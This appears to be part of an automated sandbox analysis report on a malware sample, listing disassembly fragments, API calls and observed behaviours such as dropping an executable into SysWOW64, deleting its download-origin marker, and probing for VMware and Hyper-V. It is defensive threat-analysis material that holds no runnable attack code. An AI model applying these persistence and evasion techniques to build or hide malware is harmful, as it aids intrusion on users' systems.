Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 000021B4h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D70 push ecx; mov dword ptr [esp], 00008067h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235DA0 push ecx; mov dword ptr [esp], 000036B8h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235DE0 push ecx; mov dword ptr [esp], 000025AAh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043D241 push ecx; ret
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043D5D3 push ecx; ret
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255E70 push ecx; mov dword ptr [esp], 00008D73h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255E40 push ecx; mov dword ptr [esp], 0000AEA2h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255EA0 push ecx; mov dword ptr [esp], 00007473h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255F20 push ecx; mov dword ptr [esp], 0000E2ADh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255F70 push ecx; mov dword ptr [esp], 000084ADh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255FB0 push ecx; mov dword ptr [esp], 0000460Eh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255D30 push ecx; mov dword ptr [esp], 00002C7Ch
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255D00 push ecx; mov dword ptr [esp], 000021B4h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255D70 push ecx; mov dword ptr [esp], 00008067h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255DA0 push ecx; mov dword ptr [esp], 000036B8h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02255DE0 push ecx; mov dword ptr [esp], 000025AAh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_007878CE push ecx; mov dword ptr [esp], 00002C7Ch
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078789E push ecx; mov dword ptr [esp], 000021B4h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078797E push ecx; mov dword ptr [esp], 000025AAh
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078793E push ecx; mov dword ptr [esp], 000036B8h
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078790E push ecx; mov dword ptr [esp], 00008067h

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Executable created and started: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Executable created and started: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	PE file moved: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe			Jump to behavior
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	PE file moved: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File opened: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File opened: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00406091 IsWindowVisible,IsIconic,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0041C7BA GetParent,GetParent,IsIconic,GetParent,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004274CC __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00407C2E IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00406091 IsWindowVisible,IsIconic,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0041C7BA GetParent,GetParent,IsIconic,GetParent,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004274CC __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00407C2E IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00406091 IsWindowVisible,IsIconic,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0041C7BA GetParent,GetParent,IsIconic,GetParent,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_004274CC __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00407C2E IsIconic,GetWindowPlacement,GetWindowRect,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,

Source: C:\Windows\System32\svchost.exe TID: 5080	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5080	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02233A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02233A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02253A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043FEAF VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043FEAF VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000002.00000002.499576636.0000021D13460000.00000004.00000001.sdmp	Binary or memory string: (@Hyper-V RAW
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.499561895.0000021D13453000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000002.00000002.498003505.0000021D0DE29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW]F
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.497830166.000001C87DC2A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000002.00000002.499576636.0000021D13460000.00000004.00000001.sdmp	Binary or memory string: (@Hyper-V RAW
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.499561895.0000021D13453000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000002.00000002.498003505.0000021D0DE29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW]F
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.497830166.000001C87DC2A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000004.00000002.290500060.000001F8AACC0000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.499171317.00000205F8D40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.305093993.000001EC5A080000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00401D50 SetFileAttributesA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,UpdateWindow,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00401D50 SetFileAttributesA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,UpdateWindow,

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report WZ1j9bqSlV

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging: